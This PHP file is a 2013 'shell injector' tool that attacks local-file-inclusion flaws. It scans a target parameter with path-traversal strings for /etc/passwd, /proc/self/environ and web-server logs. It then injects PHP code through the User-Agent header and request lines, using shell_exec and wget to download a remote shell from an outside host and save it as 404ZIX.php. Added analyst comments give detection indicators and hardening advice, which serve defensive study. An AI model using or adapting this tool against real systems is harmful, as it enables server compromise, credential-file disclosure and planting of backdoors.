- <?php
- /* ~~~~~~~~~~~~~~~~~~~
- Coded by ./Cat./k398rm
- ~~~~~~~~~~~~~~~~~~~~
- Analyst summary: one-page web tool. The HTML form collects a target URL that
- ends in a file-include parameter and the URL of a payload file; the PHP part
- probes that parameter with path-traversal strings and reports which system
- files and web-server logs appear readable through it.
- */
- error_reporting(0); /* turns off all PHP error reporting for this page */ ?>
- <html>
- <head>
- <style type='text/css'>
- body {
- background-color:#202020;
- color:White;
- }
- input {
- background-color:White;
- color:Black;
- border-color: Black;
- border-width: 2px;
- border-style: solid;
- }
- .copyright {
- background: -moz-linear-gradient(center bottom , #FFFFFF 0%, #000000 100%) repeat scroll 0 0 padding-box transparent;
- border: 1px solid #28343F;
- border-radius: 3px 3px 3px 3px;
- box-shadow: 0 1px 2px #647384 inset;
- }
- #down {
- color: Blue;
- font: italic 1em/30px Arial,Helvetica,sans-serif;
- height: 20px;
- margin: 30px auto 0;
- min-width: 300px;
- padding: 10px 0;
- text-align: center;
- width: 30%;
- }
- iframe { /* every iframe on the page is shrunk to 1x1 px, including the one the PHP section emits */
- width: 1px;
- height: 1px;
- }
- .none { /* hides the div elements the PHP section wraps around fetched responses */
- display:none;
- }
- textarea {
- background-color:Black;
- Color:Cyan;
- }
- .btn {
- color:Lime;
- background-color:Black;
- border-style: solid;
- border-color:White;
- border-width:2px;
- }
- </style>
- <title>APC-By Zixem.</title>
- </head>
- <body>
- <center><img src='http://i.imm.io/TB94.jpeg' width='250' height='250' /></a><font color='#202020'>_____</font><br /><u><b><i>Shell injector.</i></b></u></center><p />
- <center>
- <form action='p0ison3r_zixem.php' name='form' method='get'> <!-- GET form: the fields url, shell and Go=Start. travel in the query string of p0ison3r_zixem.php, so they normally show up in the access log of whatever server hosts this page -->
- <code>
- <u>Ex. for vuln good links:</u><br/>
- <font color='Green'><b>http://www.site.com/index.php?page=</b></font> <br/>
- <u>Ex. for vuln bad links:</u><br/>
- <font color='Red'>http://www.site.com/index.php?page=<b><del>about.php</b></del></font><br /><p />
- </code>
- Vuln link: . <td><input type='text' name='url' size='50' value='http://www.site.com/index.php?page=' /> <!-- read by the PHP section as $_GET['url']; every probe path is appended to this value -->
- <br/>
- Shell link: <td><input type='text' name='shell' size='50' value='http://creyzistyle.tk/digi7al.txt' /> <!-- pre-filled payload location; the host name is an indicator taken from this sample -->
- <br />
- <input class='btn' type='submit' name='Go' value='Start.' />
- <p />
- ___________LOG____________
- <p />
- <center></form> <!-- the read-only textarea opened on the next line receives the PHP section's text output -->
- <textarea cols='100' rows='20' readonly='readonly'>
- <?php
- // Variables part: request input, the two probe lists, and the list of hits
- /*
- Sample /etc/group lines kept by the author as a reference for the regexes:
- root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- Below: $passwd lists relative and absolute paths to /etc/passwd, /etc/group
- and /proc/self/environ; $logfiles lists candidate Apache access/error log
- paths plus httpd.conf. Each entry is later appended to $url and requested.
- Seen from the receiving server these are requests whose parameter value is a
- run of ../ segments ending in one of those file names.
- */
- $url=$_GET['url']; // taken from the query string as-is; the http:// prefix check only happens inside the if-block below
- $x404=file_get_contents($url."ZiXeM.php"); // runs on every request to this page, before any validation of $url; $x404 is not read again in this file. NOTE(review): whoever hosts this page exposes a server-side fetch of a caller-chosen location
- //$passwd= array("../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","/etc/group","../../../../../../../../../../../etc/group","../../../../../../../../proc/self/environ","/proc/self/environ","../proc/self/environ");
- $passwd= array('../../../../../../../../../../../../../etc/passwd','/etc/passwd','../etc/passwd','/etc/group','../../../../../../../../../../../etc/group','../../../../../../../../proc/self/environ','/proc/self/environ','../proc/self/environ');
- $logfiles= array("../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../../../../etc/httpd/logs/acces_log","../../../../../../../etc/httpd/logs/acces.log","../../../../../../../etc/httpd/logs/error_log","../../../../../../../etc/httpd/logs/error.log","../../../../../../../var/www/logs/access_log","../../../../../../../var/www/logs/access.log","../../../../../../../usr/local/apache/logs/access_log","../../../../../../../usr/local/apache/logs/access.log","../../../../../../../var/log/apache/access_log","../../../../../../../var/log/apache2/access_log","../../../../../../../var/log/apache/access.log","../../../../../../../var/log/apache2/access.log","../../../../../../../var/log/access_log","../../../../../../../var/log/access.log","../../../../../../../var/www/logs/error_log","../../../../../../../var/www/logs/error.log","../../../../../../../usr/local/apache/logs/error_log","../../../../../../../usr/local/apache/logs/error.log","../../../../../../../var/log/apache/error_log","../../../../../../../var/log/apache2/error_log","../../../../../../../var/log/apache/error.log","../../../../../../../var/log/apache2/error.log","../../../../../../../var/log/error_log","../../../../../../../var/log/error.log","../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","/etc/httpd/conf/httpd.conf","/logs/access.log","/logs/error.log");
- $founded= array('ZiXeM'); // index 0 is a placeholder; matching log URLs are appended from index 1 on
- if(isset($_GET['Go']) && $_GET['Go']=='Start.') { /* Runs only when the form was submitted (Go=Start.).
- Sequence as written: (1) require an http:// prefix on both inputs, (2) request
- each $passwd candidate and pattern-match the responses, (3) request each
- $logfiles candidate and look for "HTTP/1.1", (4) depending on the flags, send
- requests that carry a PHP snippet in the User-Agent header or in the URL.
- Defender view of the traffic this produces: parameter values made of ../ runs
- ending in etc/passwd, etc/group, proc/self/environ or Apache log paths,
- optionally followed by %00 or %0A; a request for ZiXeM.php; a User-Agent or
- request line containing PHP tags with shell_exec and wget; afterwards a new
- file named 404ZIX.php on the web server.
- Hardening on the receiving application: never build an include or require
- path from a request value (map the parameter onto a fixed allowlist), confine
- file access with open_basedir, and keep logs unreadable to the web-server
- account. PHP has refused NUL bytes in file paths since 5.3.4, which
- neutralises the %00 variants.
- */
- if(!preg_match("/^http:\/\//",$_GET['url'])) { // prefix test only; the rest of the value is not inspected
- die("Enter url must be with http:// !\n");
- }
- if(!preg_match("/^http:\/\//",$_GET['shell'])) { // same prefix test for the payload URL
- die("Enter shell url with http:// !\n");
- }
- echo "Starting...\nTarget: {$_GET['url']}\n====================\n\n"; // request value is written into the page without HTML escaping
- foreach($passwd as $checker) { // each candidate path is requested three times: with %00, with %0A, and bare
- $x=file_get_contents($url.$checker."%00");
- $x1=file_get_contents($url.$checker."%0A");
- $x2=file_get_contents($url.$checker);
- if(preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x1) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x2)) { // a passwd-format "bin" line appears in any of the three responses
- $groupfile=TRUE;
- }
- if(preg_match("/DOCUMENT_ROOT=\//",$x) || preg_match("/DOCUMENT_ROOT=\//",$x1) || preg_match("/DOCUMENT_ROOT=\//",$x2)) { // an environment dump containing DOCUMENT_ROOT=/ appears in a response
- $environfile=TRUE;
- }
- if(preg_match("/bin:x:1:root,bin,daemon/",$x) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x) || preg_match("/bin:x:1:root,bin,daemon/",$x1) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x1) || preg_match("/bin:x:1:root,bin,daemon/",$x2) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x2)) { // a group-format "bin" line or a passwd-format "root" line appears in a response
- $passwdfile=TRUE;
- }
- }
- if($groupfile==TRUE) { echo "[/etc/group] -> \tAvailable.\n"; } else { echo "[/etc/group] -> \tUnavailable.\n"; } // the three flags are only assigned inside the loop above; unset counts as "Unavailable"
- if($passwdfile==TRUE) { echo "[/etc/passwd] -> \tAvailable.\n";} else { echo "[/etc/passwd] -> \tUnavailable.\n"; }
- if($environfile==TRUE) { echo "[/proc/self/environ] -> Available.\n";} else { echo "[/proc/self/environ] -> Unavailable.\n"; }
- /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PART OF SCANNING THE LOG FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
- // Marker used to recognise a web-server log in a response: HTTP/1.1
- foreach($logfiles as $logfile) {
- $y=file_get_contents($url.$logfile); // candidate log path requested without a suffix
- if(preg_match("/HTTP\/1.1/i",$y)) {
- echo "[Log file]: ->\t".$url.$logfile."%00\n"; // the reported and stored URL has %00 appended
- $founded[]=$url.$logfile."%00";
- }
- else { $log_found=FALSE; } // assigned whenever a candidate does not match
- }
- if($log_found==FALSE && $environfile==TRUE) { // branch that targets /proc/self/environ
- echo "[Log file]: ->\tNot found.\n\nTrying /proc/self/environ method....\n";
- $inject_num_2 = curl_init();
- curl_setopt($inject_num_2, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ"); // first of three requests; the next two use a %00 suffix and an absolute path
- curl_setopt($inject_num_2, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_2, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>"); // Detection: the User-Agent sent to the target is PHP source (PHP tags, shell_exec, wget); such a header in access logs or at a WAF is a strong indicator
- echo "</textarea>";
- echo "<div class='none'>"; // the response printed by curl_exec lands in a div hidden by the .none style
- $final_exec=curl_exec($inject_num_2);
- echo "</div>";
- curl_close($inject_num_2);
- $inject_num_3 = curl_init();
- curl_setopt($inject_num_3, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ%00");
- curl_setopt($inject_num_3, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_3, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
- echo "<div class='none'>";
- $final_exec3=curl_exec($inject_num_3);
- echo "</div>";
- $inject_num_4 = curl_init();
- curl_setopt($inject_num_4, CURLOPT_URL, $url."/proc/self/environ%00");
- curl_setopt($inject_num_4, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_4, CURLOPT_RETURNTRANSFER, 1); // only this handle returns the response as a string instead of printing it
- curl_setopt($inject_num_4, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell'] } -O 404ZIX.php'); ?>");
- echo "<div class='none'>";
- $final_exec4=curl_exec($inject_num_4);
- echo "</div>";
- echo "<br />";
- //echo "<br /><textarea cols='50' rows='5'>";
- // close cURL resource, and free up system resources
- curl_close($inject_num_3);
- if($inject_num_2==TRUE || $inject_num_3==TRUE || $inject_num_4==TRUE) {
- die("<pre>[<font color='Lime'><b>+</b></font>] -> Chance the shell injected: [<font color='Red'><b>50%</font></b>]...the shell named 404ZIX.php\n<b>{$url}<font color='Red'>404ZIX.php</b></font>\n==============\nThanks for using ZiXeM's shell injector.</pre>"); // banner names the artefact to hunt for during incident response: 404ZIX.php
- }
- else { die("</div>Failed...sorry :S <div id='none'>"); flush(); ob_flush(); }
- }
- if($logfile==TRUE) { // log-file branch; NOTE(review): $logfile still holds the last value assigned by the foreach above
- //echo file_get_contents("{$url}/proc/self/environ");
- ?>
- <?php
- //$_SERVER['HTTP_USER_AGENT']="<h1>HeyThere</h1>";
- //echo "<iframe src='{$url}/proc/self/environ'></iframe>";
- //echo "</textarea>";
- file_get_contents($url."<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>"); // Detection: the request line sent to the target embeds PHP source, so the same text is what a poisoned log entry would contain
- file_get_contents($founded[1]); // first recorded log URL, requested from this server
- echo "<iframe src='{$founded[1]}'></iframe>"; // and once more from the operator's browser through a 1x1 iframe
- echo "<textarea class='none'>";
- }
- else { echo "/*~~~~~~~~~~~~*/\n[-] -> Sorry...shell uploading failed.\n================\nZiXeM.\n</textarea>"; }
- }
- ?>
- </textarea>
- <div id='down' class='copyright'>Copyright 2013 R3 Cyber Army<font color='Red'><b></b></font></b>
- </center>
- </body>
- </html>